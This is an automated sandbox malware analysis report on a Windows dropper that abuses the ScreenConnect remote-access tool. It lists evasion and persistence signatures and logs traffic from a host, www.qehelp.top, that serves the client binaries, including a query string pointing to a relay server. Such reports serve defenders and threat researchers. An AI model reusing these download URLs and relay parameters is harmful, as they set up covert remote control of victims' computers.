Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe

Overview

General Information

Sample name:SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe
Analysis ID:1638476
MD5:39631266cde107aafb4e947c5725dbac
SHA1:484b5b3109c5cb3861909548bed2d7f0492572b5
SHA256:721328fb869fd1bae2544be871e50ebb423cefba474a92b5939071f3cdb436d0
Tags:exeuser-SecuriteInfoCom
Infos:

Detection

ScreenConnect Tool
Score:45
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
.NET source code references suspicious native API functions
Contains functionality to hide user accounts
Detected potential unwanted application
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
PE file contains an invalid checksum
PE file does not import any functions
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe (PID: 6636 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe" MD5: 39631266CDE107AAFB4E947C5725DBAC)
    • dfsvc.exe (PID: 6712 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: dfsvc.exe PID: 6712JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

      System Summary

      barindex
      Source: Network ConnectionAuthor: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.7, DestinationIsIpv6: false, DestinationPort: 49682, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 6712, Protocol: tcp, SourceIp: 104.21.48.1, SourceIsIpv6: false, SourcePort: 443
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeVirustotal: Detection: 16%Perma Link
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeReversingLabs: Detection: 26%
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeCode function: 0_2_00F21000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00F21000
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeStatic PE information: certificate valid
      Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49682 version: TLS 1.2
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.1.dr
      Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe
      Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2775388417.000002AE8025E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE8060D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE80701000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF3630000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe.1.dr
      Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2775388417.000002AE806D5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE80262000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE80611000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.Windows.dll.1.dr
      Source: Binary string: lib.pdb source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF3771000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.pdb source: dfsvc.exe, 00000001.00000002.2778707559.000002AEF0608000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdby source: ScreenConnect.WindowsClient.exe.1.dr
      Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer322 source: dfsvc.exe, 00000001.00000002.2779624660.000002AEF1F70000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr
      Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe.1.dr
      Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb1 source: ScreenConnect.WindowsBackstageShell.exe.1.dr
      Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80609000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE80548000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE8025A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE807DF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.Core.dll.1.dr
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeCode function: 0_2_00F24B9B FindFirstFileExA,0_2_00F24B9B
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=trolsre.vjhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQDV6xFPf0gBDf2QlOVh5c6Tk56d4df2RxXNn1uOxVGhNGdttkYEP%2bQ09TDkFt%2boaP7I3GpltcCx97duxcvOFmR%2b5rjxPpj38aYagtSpx%2fmr%2fggkrYxVzh2Ub3ueGGvvMb6mUXqQCnYmk%2fUdLn9DLTUMT2UQyzY4yzsmT1pyHT%2bC6eum7vzmnvHYi2O4nABBhNCuGFMP7n6WRKSSDYq2Sq6ChgErUIKOOkmilUeWNzeQ3EEHx4BEZniwPH1Ovptzvaq%2fDqwIb40ArAot8M19Ov1q1ufJKCXo3XW2IxUzRsFajWF5ZO8ffHOFTGotiacp4LUh5tHFbALpyut0rCNh9qva&r=&i= HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzipConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
      Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
      Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=trolsre.vjhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQDV6xFPf0gBDf2QlOVh5c6Tk56d4df2RxXNn1uOxVGhNGdttkYEP%2bQ09TDkFt%2boaP7I3GpltcCx97duxcvOFmR%2b5rjxPpj38aYagtSpx%2fmr%2fggkrYxVzh2Ub3ueGGvvMb6mUXqQCnYmk%2fUdLn9DLTUMT2UQyzY4yzsmT1pyHT%2bC6eum7vzmnvHYi2O4nABBhNCuGFMP7n6WRKSSDYq2Sq6ChgErUIKOOkmilUeWNzeQ3EEHx4BEZniwPH1Ovptzvaq%2fDqwIb40ArAot8M19Ov1q1ufJKCXo3XW2IxUzRsFajWF5ZO8ffHOFTGotiacp4LUh5tHFbALpyut0rCNh9qva&r=&i= HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzipConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
      Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: www.qehelp.topAccept-Encoding: gzip
      Source: global trafficDNS traffic detected: DNS query: www.qehelp.top
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80266000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE80615000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCe
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, 00000000.00000002.1322014110.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, 00000000.00000003.1321585108.0000000000BCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTr
      Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: F2E248BEDDBB2D85122423C41028BFD40.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, 00000000.00000002.1322014110.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, 00000000.00000003.1321585108.0000000000BCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootiR
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80625000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE80277000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.d~
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
      Source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF370D000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
      Source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF3748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDatav=
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
      Source: dfsvc.exe, 00000001.00000002.2779033373.000002AEF0666000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
      Source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF3630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl&
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE8001A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80090000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80090000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
      Source: ScreenConnect.Core.dll.1.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE802DC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE807DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE804BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, 00000000.00000003.1321585108.0000000000BCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenCon
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.C
      Source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF3667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.Client.application
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE804BC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2779844547.000002AEF37ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.application
      Source: 9R0ZJ9SM.log.1.drString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=trolsre.vjhelp.site&
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE802DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.Client.dll
      Source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF37ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.Client.dlltj9m
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE804BC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE80090000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2779844547.000002AEF3667000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE802DC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE803EF000.00000004.00000800.00020000.00000000.sdmp, 9R0ZJ9SM.log.1.drString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.Client.manifest
      Source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF3667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.Client.manifestE
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80548000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE80701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.ClientSer
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80701000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2779844547.000002AEF37ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.ClientService.dll
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80629000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2779844547.000002AEF3667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.ClientService.exe
      Source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF3667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.ClientService.exed
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE807DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.Core.dll
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80629000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.Windo
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80629000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2779844547.000002AEF37ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.Windows.dll
      Source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF37ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.Windows.dllJ
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80629000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.WindowsBackstageS
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80629000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2779844547.000002AEF37ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80629000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2779844547.000002AEF37ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE807DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.WindowsCl
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE807DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.WindowsClient.exe
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80629000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2779844547.000002AEF37ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.WindowsClient.exe.config
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80629000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.WindowsFileMa
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80629000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.WindowsFileManager.ex8
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80629000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2779844547.000002AEF37ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.WindowsFileManager.exe
      Source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80629000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.WindowsFileManager.exe.config
      Source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF37ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.WindowsFileManager.exe.configU
